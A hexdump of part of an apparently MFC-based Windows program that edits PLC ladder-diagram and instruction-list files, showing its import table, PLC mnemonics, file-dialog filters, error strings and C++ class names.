0006fc60  57 49 4e 53 50 4f 4f 4c  2e 44 52 56 00 00 7a 01  |WINSPOOL.DRV..z.|
0006fc70  52 65 67 51 75 65 72 79  56 61 6c 75 65 41 00 00  |RegQueryValueA..|
0006fc80  5b 01 52 65 67 43 6c 6f  73 65 4b 65 79 00 66 01  |[.RegCloseKey.f.|
0006fc90  52 65 67 45 6e 75 6d 4b  65 79 41 00 71 01 52 65  |RegEnumKeyA.q.Re|
0006fca0  67 4f 70 65 6e 4b 65 79  41 00 62 01 52 65 67 44  |gOpenKeyA.b.RegD|
0006fcb0  65 6c 65 74 65 4b 65 79  41 00 5f 01 52 65 67 43  |eleteKeyA._.RegC|
0006fcc0  72 65 61 74 65 4b 65 79  45 78 41 00 72 01 52 65  |reateKeyExA.r.Re|
0006fcd0  67 4f 70 65 6e 4b 65 79  45 78 41 00 7b 01 52 65  |gOpenKeyExA.{.Re|
0006fce0  67 51 75 65 72 79 56 61  6c 75 65 45 78 41 00 00  |gQueryValueExA..|
0006fcf0  86 01 52 65 67 53 65 74  56 61 6c 75 65 45 78 41  |..RegSetValueExA|
0006fd00  00 00 64 01 52 65 67 44  65 6c 65 74 65 56 61 6c  |..d.RegDeleteVal|
0006fd10  75 65 41 00 9b 01 53 65  74 46 69 6c 65 53 65 63  |ueA...SetFileSec|
0006fd20  75 72 69 74 79 41 00 00  aa 00 47 65 74 46 69 6c  |urityA..⚠.GetFil|
0006fd30  65 53 65 63 75 72 69 74  79 41 00 00 5e 01 52 65  |eSecurityA..^.Re|
0006fd40  67 43 72 65 61 74 65 4b  65 79 41 00 85 01 52 65  |gCreateKeyA...Re|
0006fd50  67 53 65 74 56 61 6c 75  65 41 00 00 41 44 56 41  |gSetValueA..ADVA|
0006fd60  50 49 33 32 2e 64 6c 6c  00 00 11 00 44 72 61 67  |PI32.dll....Drag|
0006fd70  41 63 63 65 70 74 46 69  6c 65 73 00 12 00 44 72  |AcceptFiles...Dr|
0006fd80  61 67 46 69 6e 69 73 68  00 00 14 00 44 72 61 67  |agFinish....Drag|
0006fd90  51 75 65 72 79 46 69 6c  65 41 00 00 1d 00 45 78  |QueryFileA....Ex|
0006fda0  74 72 61 63 74 49 63 6f  6e 41 00 00 48 00 53 48  |tractIconA..H.SH|
0006fdb0  47 65 74 46 69 6c 65 49  6e 66 6f 41 00 00 53 48  |GetFileInfoA..SH|
0006fdc0  45 4c 4c 33 32 2e 64 6c  6c 00 43 4f 4d 43 54 4c  |ELL32.dll.COMCTL|
0006fdd0  33 32 2e 64 6c 6c 00 00  6f 6c 65 64 6c 67 2e 64  |32.dll..oledlg.d|
0006fde0  6c 6c 00 00 05 00 43 4c  53 49 44 46 72 6f 6d 50  |ll....CLSIDFromP|
0006fdf0  72 6f 67 49 44 00 06 00  43 4c 53 49 44 46 72 6f  |rogID...CLSIDFro|
0006fe00  6d 53 74 72 69 6e 67 00  1c 00 43 6f 47 65 74 43  |mString...CoGetC|
0006fe10  6c 61 73 73 4f 62 6a 65  63 74 00 00 0a 01 53 74  |lassObject....St|
0006fe20  67 4f 70 65 6e 53 74 6f  72 61 67 65 4f 6e 49 4c  |gOpenStorageOnIL|
0006fe30  6f 63 6b 42 79 74 65 73  00 00 fe 00 53 74 67 43  |ockBytes..⚠.StgC|
0006fe40  72 65 61 74 65 44 6f 63  66 69 6c 65 4f 6e 49 4c  |reateDocfileOnIL|
0006fe50  6f 63 6b 42 79 74 65 73  00 00 60 00 43 72 65 61  |ockBytes..`.Crea|
0006fe60  74 65 49 4c 6f 63 6b 42  79 74 65 73 4f 6e 48 47  |teILockBytesOnHG|
0006fe70  6c 6f 62 61 6c 00 4f 00  43 6f 54 61 73 6b 4d 65  |lobal.O.CoTaskMe|
0006fe80  6d 46 72 65 65 00 4e 00  43 6f 54 61 73 6b 4d 65  |mFree.N.CoTaskMe|
0006fe90  6d 41 6c 6c 6f 63 00 00  0d 00 43 6f 43 72 65 61  |mAlloc....CoCrea|
0006fea0  74 65 49 6e 73 74 61 6e  63 65 00 00 d8 00 4f 6c  |teInstance..⚠.Ol|
0006feb0  65 52 75 6e 00 00 0f 00  43 6f 44 69 73 63 6f 6e  |eRun....CoDiscon|
0006fec0  6e 65 63 74 4f 62 6a 65  63 74 00 00 c9 00 4f 6c  |nectObject..⚠.Ol|
0006fed0  65 49 6e 69 74 69 61 6c  69 7a 65 00 e0 00 4f 6c  |eInitialize.⚠.Ol|
0006fee0  65 55 6e 69 6e 69 74 69  61 6c 69 7a 65 00 16 00  |eUninitialize...|
0006fef0  43 6f 46 72 65 65 55 6e  75 73 65 64 4c 69 62 72  |CoFreeUnusedLibr|
0006ff00  61 72 69 65 73 00 c3 00  4f 6c 65 44 75 70 6c 69  |aries.⚠.OleDupli|
0006ff10  63 61 74 65 44 61 74 61  00 00 59 00 43 72 65 61  |cateData..Y.Crea|
0006ff20  74 65 42 69 6e 64 43 74  78 00 fa 00 53 65 74 43  |teBindCtx.⚠.SetC|
0006ff30  6f 6e 76 65 72 74 53 74  67 00 1b 01 57 72 69 74  |onvertStg...Writ|
0006ff40  65 46 6d 74 55 73 65 72  54 79 70 65 53 74 67 00  |eFmtUserTypeStg.|
0006ff50  19 01 57 72 69 74 65 43  6c 61 73 73 53 74 67 00  |..WriteClassStg.|
0006ff60  d7 00 4f 6c 65 52 65 67  47 65 74 55 73 65 72 54  |⚠.OleRegGetUserT|
0006ff70  79 70 65 00 ec 00 52 65  61 64 46 6d 74 55 73 65  |ype.⚠.ReadFmtUse|
0006ff80  72 54 79 70 65 53 74 67  00 00 ea 00 52 65 61 64  |rTypeStg..⚠.Read|
0006ff90  43 6c 61 73 73 53 74 67  00 00 0c 01 53 74 72 69  |ClassStg....Stri|
0006ffa0  6e 67 46 72 6f 6d 43 4c  53 49 44 00 52 00 43 6f  |ngFromCLSID.R.Co|
0006ffb0  54 72 65 61 74 41 73 43  6c 61 73 73 00 00 f0 00  |TreatAsClass..⚠.|
0006ffc0  52 65 6c 65 61 73 65 53  74 67 4d 65 64 69 75 6d  |ReleaseStgMedium|
0006ffd0  00 00 40 00 43 6f 52 65  67 69 73 74 65 72 4d 65  |..@.CoRegisterMe|
0006ffe0  73 73 61 67 65 46 69 6c  74 65 72 00 3e 00 43 6f  |ssageFilter.>.Co|
0006fff0  52 65 67 69 73 74 65 72  43 6c 61 73 73 4f 62 6a  |RegisterClassObj|
00070000  65 63 74 00 47 00 43 6f  52 65 76 6f 6b 65 43 6c  |ect.G.CoRevokeCl|
00070010  61 73 73 4f 62 6a 65 63  74 00 dc 00 4f 6c 65 53  |assObject.⚠.OleS|
00070020  65 74 43 6c 69 70 62 6f  61 72 64 00 c4 00 4f 6c  |etClipboard.⚠.Ol|
00070030  65 46 6c 75 73 68 43 6c  69 70 62 6f 61 72 64 00  |eFlushClipboard.|
00070040  cb 00 4f 6c 65 49 73 43  75 72 72 65 6e 74 43 6c  |⚠.OleIsCurrentCl|
00070050  69 70 62 6f 61 72 64 00  66 00 43 72 65 61 74 65  |ipboard.f.Create|
00070060  53 74 72 65 61 6d 4f 6e  48 47 6c 6f 62 61 6c 00  |StreamOnHGlobal.|
00070070  6f 6c 65 33 32 2e 64 6c  6c 00 4f 4c 45 50 52 4f  |ole32.dll.OLEPRO|
00070080  33 32 2e 44 4c 4c 00 00  4f 4c 45 41 55 54 33 32  |32.DLL..OLEAUT32|
00070090  2e 64 6c 6c 00 00 4b 01  47 65 74 50 72 6f 66 69  |.dll..K.GetProfi|
000700a0  6c 65 53 74 72 69 6e 67  41 00 91 01 49 73 57 69  |leStringA...IsWi|
000700b0  6e 64 6f 77 55 6e 69 63  6f 64 65 00 7e 00 44 65  |ndowUnicode.~.De|
000700c0  66 44 6c 67 50 72 6f 63  41 00 a6 00 44 72 61 77  |fDlgProcA.⚠.Draw|
000700d0  46 6f 63 75 73 52 65 63  74 00 d2 00 45 78 63 6c  |FocusRect.⚠.Excl|
000700e0  75 64 65 55 70 64 61 74  65 52 67 6e 00 00 65 02  |udeUpdateRgn..e.|
000700f0  53 68 6f 77 43 61 72 65  74 00 66 01 48 69 64 65  |ShowCaret.f.Hide|
00070100  43 61 72 65 74 00 8b 02  55 6e 72 65 67 69 73 74  |Caret...Unregist|
00070110  65 72 43 6c 61 73 73 41  00 00 70 01 47 65 74 54  |erClassA..p.GetT|
00070120  65 78 74 45 78 74 65 6e  74 50 6f 69 6e 74 41 00  |extExtentPointA.|
00070130  30 00 43 72 65 61 74 65  44 49 42 69 74 6d 61 70  |0.CreateDIBitmap|
00070140  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00071000  00 00 00 00 6c e2 44 00  c6 e5 44 00 06 e6 44 00  |....l⚠D.⚠⚠D..⚠D.|
00071010  72 9b 43 00 a1 9b 43 00  d3 9b 43 00 05 9c 43 00  |r.C.⚠.C.⚠.C...C.|
00071020  94 fe 44 00 8a ff 44 00  d4 01 45 00 fe f3 44 00  |.⚠D..⚠D.⚠.E.⚠⚠D.|
00071030  46 0b 45 00 6c 0b 45 00  48 22 45 00 d0 0c 43 00  |F.E.l.E.H"E.⚠.C.|
00071040  f0 22 40 00 f0 26 40 00  50 27 40 00 70 27 40 00  |⚠"@.⚠&@.P'@.p'@.|
00071050  90 27 40 00 55 59 43 00  6b 59 43 00 a9 59 43 00  |.'@.UYC.kYC.⚠YC.|
00071060  e7 59 43 00 25 5a 43 00  2d e4 44 00 65 e4 44 00  |⚠YC.%ZC.-⚠D.e⚠D.|
00071070  df 9f 44 00 02 a0 44 00  45 17 41 00 91 fd 44 00  |⚠.D..⚠D.E.A..⚠D.|
00071080  d0 02 45 00 08 03 45 00  92 0b 45 00 cc 0c 45 00  |⚠.E...E...E.⚠.E.|
00071090  6b c6 44 00 c5 d8 44 00  b8 19 45 00 00 00 00 00  |k⚠D.⚠⚠D.⚠.E.....|
000710a0  00 00 00 00 18 cd 41 00  62 e8 41 00 93 14 42 00  |.....⚠A.b⚠A...B.|
000710b0  2a 36 42 00 00 00 00 00  00 00 00 00 3b 15 42 00  |*6B.........;.B.|
000710c0  00 00 00 00 00 00 00 00  3b 36 42 00 00 00 00 00  |........;6B.....|
000710d0  43 00 00 00 54 00 00 00  4d 00 00 00 59 00 00 00  |C...T...M...Y...|
000710e0  58 00 00 00 45 4e 44 00  4d 50 50 00 4d 52 44 00  |X...END.MPP.MRD.|
000710f0  4d 50 53 00 52 53 54 00  53 45 54 00 4f 55 54 00  |MPS.RST.SET.OUT.|
00071100  4f 52 42 00 41 4e 42 00  4f 52 49 00 4f 52 00 00  |ORB.ANB.ORI.OR..|
00071110  41 4e 49 00 41 4e 44 00  4c 44 49 00 4c 44 00 00  |ANI.AND.LDI.LD..|
00071120  4e 4f 50 00 b8 b4 ce bb  d6 b8 c1 ee b2 bb c4 dc  |NOP.⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠|
00071130  ca b9 d3 c3 58 bc c4 b4  e6 c6 f7 00 d6 c3 ce bb  |⚠⚠⚠⚠X⚠⚠⚠⚠⚠⚠.⚠⚠⚠⚠|
00071140  d6 b8 c1 ee b2 bb c4 dc  ca b9 d3 c3 58 2c 54 2c  |⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠X,T,|
00071150  43 bc c4 b4 e6 c6 f7 00  ca e4 b3 f6 d6 b8 c1 ee  |C⚠⚠⚠⚠⚠⚠.⚠⚠⚠⚠⚠⚠⚠⚠|
00071160  b2 bb c4 dc ca b9 d3 c3  58 bc c4 b4 e6 c6 f7 00  |⚠⚠⚠⚠⚠⚠⚠⚠X⚠⚠⚠⚠⚠⚠.|
00071170  2d 2d 2d 5b 20 52 20 5d  00 00 00 00 2d 2d 2d 5b  |---[ R ]....---[|
00071180  20 53 20 5d 00 00 00 00  2d 2d 2d 5b 20 20 20 5d  | S ]....---[   ]|
00071190  00 00 00 00 2d 2d 2d 7c  2f 7c 2d 2d 2d 00 00 00  |....---|/|---...|
000711a0  2d 2d 2d 7c 20 7c 2d 2d  2d 00 00 00 43 4d 61 69  |---| |---...CMai|
000711b0  6e 46 72 61 6d 65 00 00  b2 bb c4 dc b4 f2 bf aa  |nFrame..⚠⚠⚠⚠⚠⚠⚠⚠|
000711c0  50 4c 43 d6 b8 c1 ee b1  ed ce c4 bc fe 00 00 00  |PLC⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠...|
000711d0  2e 70 6c 63 00 00 00 00  50 4c 43 00 d6 b8 c1 ee  |.plc....PLC.⚠⚠⚠⚠|
000711e0  b1 ed ce c4 bc fe 20 28  2a 2e 50 4c 43 29 7c 2a  |⚠⚠⚠⚠⚠⚠ (*.PLC)|*|
000711f0  2e 50 4c 43 7c 00 00 00  b5 b1 c7 b0 d6 b8 c1 ee  |.PLC|...⚠⚠⚠⚠⚠⚠⚠⚠|
00071200  b1 ed c3 bb b1 a3 b4 e6  a3 ac ca c7 b7 f1 b1 a3  |⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠|
00071210  b4 e6 d6 b8 c1 ee b1 ed  ce c4 bc fe a3 bf 00 00  |⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠..|
00071220  b2 bb c4 dc b4 f2 bf aa  50 4c 43 cc dd d0 ce cd  |⚠⚠⚠⚠⚠⚠⚠⚠PLC⚠⚠⚠⚠⚠|
00071230  bc ce c4 bc fe 00 00 00  2e 6c 61 64 00 00 00 00  |⚠⚠⚠⚠⚠....lad....|
00071240  77 62 00 00 4c 41 44 00  cc dd d0 ce cd bc ce c4  |wb..LAD.⚠⚠⚠⚠⚠⚠⚠⚠|
00071250  bc fe 20 28 2a 2e 4c 41  44 29 7c 2a 2e 4c 41 44  |⚠⚠ (*.LAD)|*.LAD|
00071260  7c 00 00 00 b5 b1 c7 b0  cc dd d0 ce cd bc c3 bb  ||...⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠|
00071270  b1 a3 b4 e6 a3 ac ca c7  b7 f1 b1 a3 b4 e6 cc dd  |⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠|
00071280  d0 ce cd bc ce c4 bc fe  a3 bf 00 00 4c 6f 63 61  |⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠..Loca|
00071290  6c 20 41 70 70 57 69 7a  61 72 64 2d 47 65 6e 65  |l AppWizard-Gene|
000712a0  72 61 74 65 64 20 41 70  70 6c 69 63 61 74 69 6f  |rated Applicatio|
000712b0  6e 73 00 00 43 50 4c 43  44 6f 63 00 43 50 4c 43  |ns..CPLCDoc.CPLC|
000712c0  56 69 65 77 00 00 00 00  4e 4e 54 43 01 00 43 00  |View....NNTC..C.|
000712d0  01 00 f4 01 20 20 20 4b  00 00 00 00 25 30 33 64  |..⚠.   K....%03d|
000712e0  00 00 00 00 4e 4f 50 20  20 20 20 20 00 00 00 00  |....NOP     ....|
000712f0  45 4e 44 20 20 20 20 20  00 00 00 00 4d 50 50 20  |END     ....MPP |
00071300  20 20 20 20 00 00 00 00  4d 52 44 20 20 20 20 20  |    ....MRD     |
00071310  00 00 00 00 4d 50 53 20  20 20 20 20 00 00 00 00  |....MPS     ....|
00071320  52 53 54 20 20 20 20 20  00 00 00 00 53 45 54 20  |RST     ....SET |
00071330  20 20 20 20 00 00 00 00  4f 55 54 20 20 20 20 20  |    ....OUT     |
00071340  00 00 00 00 4f 52 42 20  20 20 20 20 00 00 00 00  |....ORB     ....|
00071350  41 4e 42 20 20 20 20 20  00 00 00 00 4f 52 49 20  |ANB     ....ORI |
00071360  20 20 20 20 00 00 00 00  4f 52 20 20 20 20 20 20  |    ....OR      |
00071370  00 00 00 00 41 4e 49 20  20 20 20 20 00 00 00 00  |....ANI     ....|
00071380  41 4e 44 20 20 20 20 20  00 00 00 00 4c 44 49 20  |AND     ....LDI |
00071390  20 20 20 20 00 00 00 00  4c 44 20 20 20 20 20 20  |    ....LD      |
000713a0  00 00 00 00 25 30 33 64  20 20 20 00 25 30 34 64  |....%03d   .%04d|
000713b0  00 00 00 00 52 00 00 00  53 00 00 00 4b 25 30 34  |....R...S...K%04|
000713c0  64 00 00 00 5b 52 55 4e  5d 00 00 00 5b 53 54 4f  |d...[RUN]...[STO|
000713d0  50 5d 00 00 ce de b1 ea  cc e2 00 00 43 61 6e 20  |P]..⚠⚠⚠⚠⚠⚠..Can |
000713e0  6e 6f 74 20 6f 70 65 6e  20 50 4c 43 20 6c 61 64  |not open PLC lad|
000713f0  64 65 72 20 66 69 6c 65  21 00 00 00 72 62 00 00  |der file!...rb..|
00071400  4c 61 64 64 65 72 20 66  69 6c 65 20 28 2a 2e 4c  |Ladder file (*.L|
00071410  41 44 29 7c 2a 2e 4c 41  44 7c 00 00 69 6e 73 74  |AD)|*.LAD|..inst|
00071420  72 75 63 74 20 66 69 6c  65 20 28 2a 2e 50 4c 43  |ruct file (*.PLC|
00071430  29 7c 2a 2e 50 4c 43 7c  00 00 00 00 43 61 6e 20  |)|*.PLC|....Can |
00071440  6e 6f 74 20 6f 70 65 6e  20 50 4c 43 20 66 69 6c  |not open PLC fil|
00071450  65 00 00 00 43 61 6e 20  6e 6f 74 20 6f 70 65 6e  |e...Can not open|
00071460  20 50 4c 43 20 69 6e 73  74 72 75 74 20 66 69 6c  | PLC instrut fil|
00071470  65 21 00 00 49 6e 73 74  72 75 74 20 66 69 6c 65  |e!..Instrut file|
00071480  20 28 2a 2e 50 4c 43 29  7c 2a 2e 50 4c 43 7c 00  | (*.PLC)|*.PLC|.|
00071490  6c 61 64 64 65 72 20 66  69 6c 65 20 28 2a 2e 4c  |ladder file (*.L|
000714a0  41 44 29 7c 2a 2e 4c 41  44 7c 00 00 d6 b8 c1 ee  |AD)|*.LAD|..⚠⚠⚠⚠|
000714b0  b1 ed d6 d0 c8 b1 c9 d9  4f 55 54 2f 53 45 54 2f  |⚠⚠⚠⚠⚠⚠⚠⚠OUT/SET/|
000714c0  52 53 54 d6 b8 c1 ee a3  a1 00 00 00 d6 b8 c1 ee  |RST⚠⚠⚠⚠⚠⚠...⚠⚠⚠⚠|
000714d0  b1 ed d6 d0 4d 50 53 2f  4d 52 44 2f 4d 50 50 b4  |⚠⚠⚠⚠MPS/MRD/MPP⚠|
000714e0  e6 d4 da ce ca cc e2 a3  a1 00 00 00 b2 bb b7 fb  |⚠⚠⚠⚠⚠⚠⚠⚠⚠...⚠⚠⚠⚠|
000714f0  ba cf d6 b8 c1 ee b1 ed  b9 e6 d4 f2 b5 c4 b4 ed  |⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠|
00071500  ce f3 21 00 ce de b7 a8  ca b6 b1 f0 b5 c4 d6 b8  |⚠⚠!.⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠|
00071510  c1 ee 21 00 d6 b8 c1 ee  4d 52 44 2f 4d 50 50 ce  |⚠⚠!.⚠⚠⚠⚠MRD/MPP⚠|
00071520  de b6 d4 d3 a6 b5 c4 4d  50 53 d6 b8 c1 ee 21 00  |⚠⚠⚠⚠⚠⚠⚠MPS⚠⚠⚠⚠!.|
00071530  d6 b8 c1 ee 4c 44 2f 4c  44 49 b5 c4 c7 b6 cc d7  |⚠⚠⚠⚠LD/LDI⚠⚠⚠⚠⚠⚠|
00071540  c9 ee b6 c8 b2 bb d3 a6  b3 ac b9 fd 31 35 b2 e3  |⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠15⚠⚠|
00071550  21 00 00 00 d6 b8 c1 ee  4d 50 53 b5 c4 c7 b6 cc  |!...⚠⚠⚠⚠MPS⚠⚠⚠⚠⚠|
00071560  d7 c9 ee b6 c8 b2 bb d3  a6 b3 ac b9 fd 31 38 b2  |⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠18⚠|
00071570  e3 21 00 00 d6 b8 c1 ee  41 4e 42 2f 4f 52 42 ce  |⚠!..⚠⚠⚠⚠ANB/ORB⚠|
00071580  de b6 d4 d3 a6 b5 c4 4c  44 2f 4c 44 49 d6 b8 c1  |⚠⚠⚠⚠⚠⚠⚠LD/LDI⚠⚠⚠|
00071590  ee 21 00 00 ce de b7 a8  d7 aa bb bb a3 ac d2 f2  |⚠!..⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠|
000715a0  ce aa cc dd d0 ce cd bc  d2 bb d0 d0 b5 c4 d4 aa  |⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠|
000715b0  bc fe ca fd d4 da 31 36  b8 f6 d2 d4 c4 da 21 00  |⚠⚠⚠⚠⚠⚠16⚠⚠⚠⚠⚠⚠!.|
000715c0  d6 b8 c1 ee 4c 44 2f 4c  44 49 ce de b6 d4 d3 a6  |⚠⚠⚠⚠LD/LDI⚠⚠⚠⚠⚠⚠|
000715d0  b5 c4 41 4e 42 2f 4f 52  42 d6 b8 c1 ee 21 00 00  |⚠⚠ANB/ORB⚠⚠⚠⚠!..|
000715e0  cc ab b3 a4 a3 ac b3 ac  b9 fd 31 30 30 30 d0 d0  |⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠1000⚠⚠|
000715f0  21 00 00 00 d0 d0 b8 bd  bd fc d3 d0 b4 ed a1 a3  |!...⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠|
00071600  b4 ed ce f3 c0 e0 d0 cd  a3 ba 00 00 25 64 00 00  |⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠..%d..|
00071610  d6 b8 c1 ee b1 ed b5 c4  b5 da 00 00 b2 bb b7 fb  |⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠..⚠⚠⚠⚠|
00071620  ba cf cc dd d0 ce cd bc  b9 e6 d4 f2 b5 c4 b4 ed  |⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠|
00071630  ce f3 21 00 ce de b7 a8  ca b6 b1 f0 b5 c4 d4 aa  |⚠⚠!.⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠|
00071640  bc fe 21 00 b8 c3 d0 d0  d3 a6 d3 d0 b3 a3 bf aa  |⚠⚠!.⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠|
00071650  bb f2 b3 a3 b1 d5 b4 a5  b5 e3 21 00 b8 c3 d0 d0  |⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠!.⚠⚠⚠⚠|
00071660  b2 bb cd ea d5 fb a3 ac  d3 d0 bf d5 c8 b1 bb f2  |⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠|
00071670  b7 c7 b7 a8 d4 aa bc fe  21 00 00 00 cc dd d0 ce  |⚠⚠⚠⚠⚠⚠⚠⚠!...⚠⚠⚠⚠|
00071680  cd bc b5 c4 b5 da 00 00  69 6e 73 74 72 75 74 20  |⚠⚠⚠⚠⚠⚠..instrut |
00071690  66 69 6c 65 20 28 2a 2e  50 4c 43 29 7c 2a 2e 50  |file (*.PLC)|*.P|
000716a0  4c 43 7c 00 41 72 65 20  79 6f 75 20 73 61 76 65  |LC|.Are you save|
000716b0  20 69 6e 73 74 72 75 74  20 66 69 6c 65 a3 bf 00  | instrut file⚠⚠.|
000716c0  41 72 65 20 79 6f 75 20  73 61 76 65 20 6c 61 64  |Are you save lad|
000716d0  64 65 72 20 66 69 6c 65  a3 bf 00 00 c9 be b3 fd  |der file⚠⚠..⚠⚠⚠⚠|
000716e0  d2 bb d0 d0 d6 b8 c1 ee  00 00 00 00 b2 e5 c8 eb  |⚠⚠⚠⚠⚠⚠⚠⚠....⚠⚠⚠⚠|
000716f0  d2 bb d0 d0 bf d5 d6 b8  c1 ee 00 00 b1 e0 bc ad  |⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠..⚠⚠⚠⚠|
00071700  d2 bb d0 d0 d6 b8 c1 ee  00 00 00 00 b2 e5 c8 eb  |⚠⚠⚠⚠⚠⚠⚠⚠....⚠⚠⚠⚠|
00071710  d2 bb d0 d0 09 43 74 72  6c 2b 49 6e 73 65 72 74  |⚠⚠⚠⚠.Ctrl+Insert|
00071720  00 00 00 00 c9 be b3 fd  d2 bb d0 d0 09 43 74 72  |....⚠⚠⚠⚠⚠⚠⚠⚠.Ctr|
00071730  6c 2b 44 45 4c 45 54 45  00 00 00 00 c9 be b3 fd  |l+DELETE....⚠⚠⚠⚠|
00071740  b4 b9 cf df 09 53 68 69  66 74 2b 44 45 4c 45 54  |⚠⚠⚠⚠.Shift+DELET|
00071750  45 00 00 00 c9 be b3 fd  d4 aa bc fe 09 44 45 4c  |E...⚠⚠⚠⚠⚠⚠⚠⚠.DEL|
00071760  45 54 45 00 ca e4 b3 f6  b8 b4 ce bb 09 43 74 72  |ETE.⚠⚠⚠⚠⚠⚠⚠⚠.Ctr|
00071770  6c 2b 52 00 ca e4 b3 f6  d6 c3 ce bb 09 43 74 72  |l+R.⚠⚠⚠⚠⚠⚠⚠⚠.Ctr|
00071780  6c 2b 53 00 ca e4 b3 f6  cf df c8 a6 09 43 74 72  |l+S.⚠⚠⚠⚠⚠⚠⚠⚠.Ctr|
00071790  6c 2b 59 00 b3 a3 b1 d5  b4 a5 b5 e3 09 43 74 72  |l+Y.⚠⚠⚠⚠⚠⚠⚠⚠.Ctr|
000717a0  6c 2b 4e 00 b3 a3 bf aa  b4 a5 b5 e3 09 43 74 72  |l+N.⚠⚠⚠⚠⚠⚠⚠⚠.Ctr|
000717b0  6c 2b 4f 00 b4 b9 d6 b1  c1 ac cf df 09 43 74 72  |l+O.⚠⚠⚠⚠⚠⚠⚠⚠.Ctr|
000717c0  6c 2b 49 00 cb ae c6 bd  c1 ac cf df 09 43 74 72  |l+I.⚠⚠⚠⚠⚠⚠⚠⚠.Ctr|
000717d0  6c 2b 48 00 43 4f 55 4e  54 45 52 00 54 49 4d 45  |l+H.COUNTER.TIME|
000717e0  52 00 00 00 4f 55 54 4f  55 54 20 52 65 6c 61 79  |R...OUTOUT Relay|
000717f0  00 00 00 00 41 73 73 69  73 74 61 6e 74 20 52 65  |....Assistant Re|
00071800  6c 61 79 00 25 30 32 64  00 00 00 00 49 4e 50 55  |lay.%02d....INPU|
00071810  54 20 52 65 6c 61 79 00  08 40 46 00 00 00 00 00  |T Relay..@F.....|
00071820  2e 3f 41 56 43 4f 62 6a  65 63 74 40 40 00 00 00  |.?AVCObject@@...|
00071830  08 40 46 00 00 00 00 00  2e 3f 41 56 43 43 6d 64  |.@F......?AVCCmd|
00071840  54 61 72 67 65 74 40 40  00 00 00 00 00 00 00 00  |Target@@........|
00071850  08 40 46 00 00 00 00 00  2e 3f 41 56 43 57 6e 64  |.@F......?AVCWnd|
00071860  40 40 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |@@.......@F.....|
00071870  2e 3f 41 56 43 44 69 61  6c 6f 67 40 40 00 00 00  |.?AVCDialog@@...|
00071880  08 40 46 00 00 00 00 00  2e 50 41 56 43 45 78 63  |.@F......PAVCExc|
00071890  65 70 74 69 6f 6e 40 40  00 00 00 00 00 00 00 00  |eption@@........|
000718a0  08 40 46 00 00 00 00 00  2e 3f 41 56 43 43 6d 64  |.@F......?AVCCmd|
000718b0  55 49 40 40 00 00 00 00  08 40 46 00 00 00 00 00  |UI@@.....@F.....|
000718c0  2e 3f 41 56 43 54 65 73  74 43 6d 64 55 49 40 40  |.?AVCTestCmdUI@@|
000718d0  00 00 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |.........@F.....|
000718e0  2e 50 41 56 43 55 73 65  72 45 78 63 65 70 74 69  |.PAVCUserExcepti|
000718f0  6f 6e 40 40 00 00 00 00  08 40 46 00 00 00 00 00  |on@@.....@F.....|
00071900  2e 3f 41 56 43 54 65 6d  70 57 6e 64 40 40 00 00  |.?AVCTempWnd@@..|
00071910  08 40 46 00 00 00 00 00  2e 3f 41 56 43 4e 6f 54  |.@F......?AVCNoT|
00071920  72 61 63 6b 4f 62 6a 65  63 74 40 40 00 00 00 00  |rackObject@@....|
00071930  08 40 46 00 00 00 00 00  2e 3f 41 56 5f 41 46 58  |.@F......?AV_AFX|
00071940  5f 43 54 4c 33 44 5f 53  54 41 54 45 40 40 00 00  |_CTL3D_STATE@@..|
00071950  ff ff ff ff ff ff ff ff  ff ff ff ff e5 9a 43 00  |⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠⚠.C.|
00071960  08 40 46 00 00 00 00 00  2e 3f 41 56 43 44 43 40  |.@F......?AVCDC@|
00071970  40 00 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |@........@F.....|
00071980  2e 3f 41 56 43 43 6c 69  65 6e 74 44 43 40 40 00  |.?AVCClientDC@@.|
00071990  08 40 46 00 00 00 00 00  2e 3f 41 56 43 57 69 6e  |.@F......?AVCWin|
000719a0  64 6f 77 44 43 40 40 00  08 40 46 00 00 00 00 00  |dowDC@@..@F.....|
000719b0  2e 3f 41 56 43 50 61 69  6e 74 44 43 40 40 00 00  |.?AVCPaintDC@@..|
000719c0  08 40 46 00 00 00 00 00  2e 3f 41 56 43 47 64 69  |.@F......?AVCGdi|
000719d0  4f 62 6a 65 63 74 40 40  00 00 00 00 00 00 00 00  |Object@@........|
000719e0  08 40 46 00 00 00 00 00  2e 3f 41 56 43 50 65 6e  |.@F......?AVCPen|
000719f0  40 40 00 00 00 00 00 00  08 40 46 00 00 00 00 00  |@@.......@F.....|
00071a00  2e 3f 41 56 43 42 72 75  73 68 40 40 00 00 00 00  |.?AVCBrush@@....|
00071a10  08 40 46 00 00 00 00 00  2e 3f 41 56 43 54 65 6d  |.@F......?AVCTem|
